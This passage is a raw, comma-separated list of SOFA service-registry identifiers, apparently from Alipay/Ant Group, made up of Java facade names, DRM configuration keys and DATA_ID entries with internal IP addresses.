0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.healthCheckSchedulerExecutorFixedPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.speech.api.report.IllegalSpeechReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.withdraw.api.AdvanceAsyncContractService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-mif-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pointmng_templateRevise_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.229.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linke.aci.core.facade.DockerImageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmmccore.closeloop.service.facade.api.ChannelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.materials.MaterialsManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.taskDeferredSecondsByTaskKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitFrameConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ReadMeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0:userview@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.customQueryTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zbdm.common.service.facade.phytable.TableSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IMATCHFACADE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.manager.facade.api.EinvLotteryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:autoAccessProcessCallBack@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegeocoding.common.service.facade.ldc.MarketingBizAreaServiceInCZone:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dtsermng.common.service.facade.datatrans.DatatransQueryJobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfmac_ProcessCommBudgetMainActiveCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotbsp.business.facade.flashpay.FlashPayFacade:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.AuthorityRuleCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeexprod.facade.PartnerPayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.update.SchedulerTaskUpdateFacade:1.0:zpaas@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.PhysicalModelingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimportal.common.service.InsClaimDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.verify.VerifyAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.biscenter.uem.common.service.facade.permission.v2.AlipayCardPermissionVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmng.service.facade.ctrl.DataCacheRefreshService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitypublishcore.common.service.facade.api.AccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_DECLARE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cfmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.crowd.CrowdQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:loanpromoweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.188.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.acappcore.biz.buildpack.internal.rest.BuildpackInternalRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finannafccore.facade.api.AnnaSuggestSolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LPRConfigDrm.openLpr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:validSignContractNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantservice.common.service.facade.api.AssistantModularTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.210.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.biz.service.gw.community.api.market.EarningsManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.facade.MasterDataQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskCatQueryService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.inst.service.InstAssetsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.incomestatistics.facade.api.suggest.SuggestServiceFacede:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_KBSERV#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.dweg:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_SMDD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:agdscdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:acordercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.core.service.stuff.MachineCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.channelInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-PCCMC-SERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.custstk.cachecore.drm.GeneralCacheSwitch.chargetbasecache.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.common.service.facade.api.service.MvnRepositoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.judge.api.JudgeCaseRepositoryUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.onecent.HistoryNewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.sdk.standard.GuardianNotifier:1.0:instbill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:OTS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.181.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.drcc.facade.DrSwitchAutoDecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certify.service.facade.CertifyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antgroup.zmxy.zmepcore.common.service.facade.service.data.UserGroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cswork.facade.permission.api.ZarkUserGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauditcenter.facade.OperationTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityCategorySearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chameleon.common.service.facade.logAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:spBdsProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.194.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditauthprod.service.facade.zmgo.agreement.AgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finbatch_finreconSequenceDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:agdswindspeed@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.build.MiniAppBuildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.salesplan.SalesPlanSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.BackstagecategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_ITECHRISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.subTemplateBudget,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.bizprod.common.service.facade.api.PocketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:linke#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.biz.shared.feature.RearDetectFeatureActuator:1.0:rearUsabilityDetectActuator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicAppTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:mbillexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.api.SolutionTestService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdAbilityManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iriskservice.common.service.model.plugin.spi.RiskPluginReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:crmhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.suiteide.common.service.facade.api.ComponentTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_RISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:bic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.facade.manage.api.ParmDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.105.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.8.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciamcore.common.service.facade.identity.IdpServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmTairVersionManager.cdsProductVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secdatacontext.common.facade.api.manage.DataAssetsVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.rebalanceMinOffset,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.116.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundprod.common.service.facade.prodmng.api.FundProductConfigMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.176.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincorecheck.common.service.facade.bizcheck.ProdtransCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:riskinsight@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.white.service.WhiteUserQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.120.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_redeem_daemon.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_T_YLB#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_C_GOLD_OPEN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:test-model@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.30.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.workdata.WorkDataMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.BatchPayReceiptService:1.0:nevermore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResRecTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","iaassettrans@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bizfundprod.common.service.facade.transfer.SingleTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.auth.AuthManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dtbank.facade.activity.ActivityCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.client.TaskHubClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:crmhome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.FrontDetectFeatureActuator:1.0:frontBroadNameActuator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.BizDataPullFacade:1.0:edeductcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.220.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zonemng.query.facade.api.EnvQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.ipay.icif.service.facade.api.AccessTokenQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.agdspaydecision.facade.PayDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.comment.CommentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.RequestRecordModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:adrtbcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardBinValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExVerticalDeviationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeexprod.common.service.facade.FpSelfServiceRefundService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.basementurl.facade.URLService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antfeaturelib.common.facade.service.ThirdPartyJarMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.udataservice.service.facade.UniformQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.orderlink.notify.OrderLinkNotifyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.backstage.SysParamMgrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.QuoteQueryFacade:1.0:gold@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.CodeRouteService:1.0:mobilerelation@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.apply.LoanRestructureFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.LotteryLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerCoBuildingZsbmMeetingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdsds.common.service.facade.privilege.service.UserPrivilegeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.TopUpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.148.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.core.service.emulator.dal.logsim.appbasedata.OeEmulatorAppBaseDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.link.facade.StoreTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloantrade.common.service.facade.api.account.LoanAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.loancore.common.service.facade.alipay.api.rzone.query.ZlcArgQueryRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbmarketcenter.common.service.facade.manager.service.MarketActivityManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.encrypt-cookies:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lendpofprod.common.service.facade.api.account.AccountCloseConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zprod.face.service.usable.UsableReferenceSourceCheckFaceLdcService:1.0:zhubbatchalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.SecCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntOutfluxHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.locking.LockServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finmatchcore:name=com.alipay.finmatchcore.common.service.facade.client.drm.MatchConfigClientDrm.consumeThreadNums,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.GroupRelationManageRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizops.facade.ParamRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.model.ModelManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.fintradecenter.FintradeBusinessTypeQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.GuardianTaskStatisticServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:pledgecoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.FinProductQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.schedule.ScheduleQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskdatacenter.service.facade.detect.CapacityDetectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.YiCaiNewsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.InvokeFacadeStoreSwitchResource.useNewVersionStore,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instanalysis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.template.PublicMsgTemplateRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:tbapi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.mng.AdvisorOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:xztest_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointQuotaConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.CommoditiesOrderRecoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.open.AssetNewApplyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.trafficoperation.TrafficServiceStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.settlequery.BankCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.178.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discountcore.common.service.facade.DiscountBudgetService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antbank.robot.helper.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:echannelcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.216.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","changeiteration@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zdataquery.common.service.facade.galaxy.FinSchedulerGalaxyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.marketpoint.api.MptransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:customscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.security.common.bus.CommandHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.adjust.AdjustManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_autoFinanceOperateArCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityModuleConfigMngGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_mm_openDemandAccount1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ali